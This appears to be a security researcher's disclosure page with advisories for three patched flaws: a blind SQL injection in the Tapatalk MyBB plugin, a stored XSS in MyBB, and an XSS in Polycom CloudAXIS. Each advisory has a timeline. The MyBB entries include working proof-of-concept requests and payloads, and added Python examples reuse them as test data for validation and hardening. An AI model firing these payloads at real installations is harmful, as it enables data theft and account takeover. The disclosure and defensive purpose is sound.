Exploits
The following exploits were found by myself and responsibly disclosed to all relevant parties before their public disclosure here.
Tapatalk for MyBB Plugin SQL Injection Vulnerability (CVE-2017-14652)
A time-based blind SQL injection exists in the mobiquo/lib/classTTForum.php file in the Tapatalk for MyBB Plugin, for versions prior to 4.5.8. The vulnerability allows an unauthenticated user to inject SQL as part of the user registration process. The injection occurs within a SELECT statement and as such could be used to extract data from the database.
CVSS v2 Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Proof of Concept
Set the correct host header on the below request and send it to a MySQL based installation of MyBB with the Tapatalk plugin installed.
POST /mobiquo/mobiquo.php HTTP/1.1
Host: <insert-correct-host-header>
Accept: */*
mobiquoid: 2
Mobiquo_id: 2
Accept-Language: en-us
Content-Type: text/xml
Content-Length: 498
Connection: keep-alive
Cookie: tapatalk=1
TT-VERSION: 1844

<methodCall><methodName>sign_in</methodName><params><param><value><string></string></value></param><param><value><string></string></value></param><param><value><base64>dGVzdEBleGFtcGxlLmNvbQ==</base64></value></param><param><value><base64>dXNlcm5hbWU=</base64></value></param><param><value><base64>cGFzc3dvcmQ=</base64></value></param><param><value><struct><member><name>test' AND SLEEP(10) -- a</name><value><base64>dGVzdA==</base64></value></member></struct></value></param></params></methodCall>

If successful the MySQL instance should sleep for 10 seconds.
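The injected value in the request above travels in a struct member name of the XML-RPC sign_in call. The following added example (not Tapatalk's or MyBB's code) shows the server-side check that closes this class of bug and that also serves as a detector over logged request bodies: parse the XML-RPC body, pull out every struct member name, and refuse the request unless each name is a plain identifier. It assumes the handler uses those names inside a SELECT, which is why an allowlist on the name rather than escaping is the right control; the request bodies in the block are constructed for the demonstration.

```python
"""Validate struct member names in a Tapatalk-style XML-RPC sign_in request.

Added example, not Tapatalk's or MyBB's code. It assumes the server takes the
member names of the final <struct> parameter and uses them inside a SELECT;
the control shown is an allowlist check on those names before any SQL is
built. The request bodies below are constructed for the demonstration.
"""
import re
import xml.etree.ElementTree as ET

# Unquoted MySQL-style identifier: letters, digits, underscore, at most 64
# characters. Quotes, spaces and comment markers never match.
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")

# Constructed: the shape of the advisory's request body with the injected
# member name, plus a benign counterpart.
MALICIOUS_BODY = (
    "<methodCall><methodName>sign_in</methodName><params>"
    "<param><value><string></string></value></param>"
    "<param><value><string></string></value></param>"
    "<param><value><base64>dGVzdEBleGFtcGxlLmNvbQ==</base64></value></param>"
    "<param><value><base64>dXNlcm5hbWU=</base64></value></param>"
    "<param><value><base64>cGFzc3dvcmQ=</base64></value></param>"
    "<param><value><struct><member>"
    "<name>test' AND SLEEP(10) -- a</name>"
    "<value><base64>dGVzdA==</base64></value>"
    "</member></struct></value></param>"
    "</params></methodCall>"
)
BENIGN_BODY = MALICIOUS_BODY.replace("test' AND SLEEP(10) -- a", "custom_field")


def extract_struct_member_names(body: str) -> list[str]:
    """Return every <member><name> text found in the request's struct params."""
    # ET.fromstring is adequate for this small, entity-free example; a real
    # server should parse untrusted XML with defusedxml or with entity
    # expansion disabled.
    root = ET.fromstring(body)
    return [
        (name.text or "")
        for name in root.findall("./params/param/value/struct/member/name")
    ]


def is_safe_identifier(name: str) -> bool:
    """True if name can be used as an unquoted column name without escaping."""
    return IDENTIFIER_RE.fullmatch(name) is not None


def check_sign_in_request(body: str) -> tuple[bool, list[str]]:
    """Validate a sign_in body.

    Returns (accepted, rejected_names). A handler should refuse the whole
    request when rejected_names is non-empty rather than try to sanitise;
    the same function run over stored request bodies flags past attempts.
    """
    names = extract_struct_member_names(body)
    rejected = [n for n in names if not is_safe_identifier(n)]
    return (not rejected, rejected)


if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        accepted, rejected = check_sign_in_request(body)
        print(f"{label}: accepted={accepted} rejected={rejected}")
```

The allowlist is deliberately stricter than "no quotes": a member name that is going to become part of a SQL statement should only ever be something the schema actually contains, so a production handler would compare against the fixed set of expected keys rather than a regex.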
Timeline
July 30th 2017 - Vulnerability discovered and disclosed privately to Tapatalk.
July 31st 2017 - Vulnerability fixed in Tapatalk for MyBB Plugin v4.5.8.
Sept 12th 2017 - Vulnerability disclosed publicly here.
MyBB Cross-site Scripting (XSS) Vulnerability (CVE-2015-4552)
A persistent Cross-site Scripting (XSS) vulnerability exists in the /xmlhttp.php file in MyBB (aka MyBulletinBoard) versions before 1.8.5, which allows remote attackers (authenticated and in some cases unauthenticated) to inject arbitrary web script or HTML into their posts. Whilst the injected code is not rendered in posts themselves, if the post's quick edit AJAX URL is opened in a browser window, the injected code would be rendered. Since administrators / moderators can use the quick edit feature on any post, this vulnerability could be used to target administrator / moderator accounts.
CVSS v2 Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:F/RL:OF/RC:C)
Proof of Concept
Create a post with the content set to:
<script>alert(1)</script>
Get the ID of the post from the HTML (there are numerous locations where it is used) and use it in the following URL:
http://example.com/xmlhttp.php?action=edit_post&do=get_post&pid=ENTER_POST_ID_HERE
Open the URL in a browser window. The JavaScript should execute and create an alert box with the contents "1". This URL will work for the user who created the post, administrators, super moderators, and moderators with permission to edit posts in the forum in which the post was made. All other users will see a permissions error.
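The underlying defect is an AJAX endpoint that hands raw post text back in a response the browser treats as a page. The following added example (not MyBB's code) puts the vulnerable pattern beside the hardened one: the unsafe handler returns the text as text/html, the safe one returns JSON with X-Content-Type-Options: nosniff and escapes the text wherever it is emitted into an HTML context. The post store, post ids and handler names are constructed stand-ins for the demonstration.

```python
"""A quick-edit AJAX endpoint: vulnerable and hardened response handling.

Added example, not MyBB's code. It assumes a handler that looks a post's raw
text up by id and returns it to a JavaScript caller; the post store and ids
below are constructed for the demonstration.
"""
import html
import json

# Constructed post store: id -> (author_id, raw text). Post 42 holds the
# advisory's test payload.
POSTS = {
    41: (7, "Hello, world"),
    42: (9, "<script>alert(1)</script>"),
}


def unsafe_get_post(pid: int) -> tuple[dict, str]:
    """Vulnerable: raw post text as a text/html body, so a browser renders it."""
    _author, text = POSTS[pid]
    return ({"Content-Type": "text/html; charset=utf-8"}, text)


def safe_get_post(pid: int) -> tuple[dict, str]:
    """Hardened: the text is data in a JSON document, never a rendered page.

    The JSON content type plus nosniff stops a browser that opens the URL
    directly from interpreting the body as HTML; encoding '<' as \\u003c keeps
    the document inert even if it is later inlined into a <script> block.
    """
    _author, text = POSTS[pid]
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    body = json.dumps({"pid": pid, "message": text}).replace("<", "\\u003c")
    return (headers, body)


def render_textarea(text: str) -> str:
    """Escape for the one place the text legitimately lands in HTML: the edit box."""
    return "<textarea>" + html.escape(text, quote=True) + "</textarea>"


def response_would_render_html(headers: dict, body: str) -> bool:
    """Review check: an HTML content type with markup in the body is a finding."""
    ctype = headers.get("Content-Type", "").lower()
    return ctype.startswith("text/html") and "<" in body


if __name__ == "__main__":
    print("unsafe renders html:", response_would_render_html(*unsafe_get_post(42)))
    print("safe renders html:  ", response_would_render_html(*safe_get_post(42)))
    print(render_textarea(POSTS[42][1]))
```

The JavaScript caller should read the JSON field and assign it to the textarea's value property rather than build markup from it; the escaping in render_textarea is for the server-rendered page, and applying both layers is what keeps a single missed call from becoming a stored XSS.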
Timeline
April 28th 2015 - Vulnerability discovered and disclosed privately to MyBB team.
April 29th 2015 - Vulnerability report accepted and bug confirmed by MyBB team.
May 27th 2015 - Vulnerability fixed as part of MyBB 1.8.5.
June 15th 2015 - Vulnerability disclosed publicly here.
Polycom RealPresence CloudAXIS Suite Cross-site Scripting (XSS) Vulnerability (CVE-2015-1516)
A persistent Cross-site Scripting (XSS) vulnerability exists in Polycom RealPresence CloudAXIS Suite versions prior to 1.7.0 which allows a remote authenticated user to inject arbitrary JavaScript or HTML into the application. Injected code is rendered and executed by a victim's web browser as soon as they join the session.
This vulnerability was found whilst working for CNS Hut3.
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:OF/RC:C)
Timeline
Sept 16th 2014 - Vulnerability discovered.
Nov 20th 2014 - Vulnerability disclosed to Polycom Security Team.
Dec 12th 2014 - Vulnerability report accepted and bug confirmed as fixed pending testing and verification.
April 2015 - Vulnerability fixed as part of 1.7.0 update.
June 18th 2015 - Vulnerability disclosed publicly here.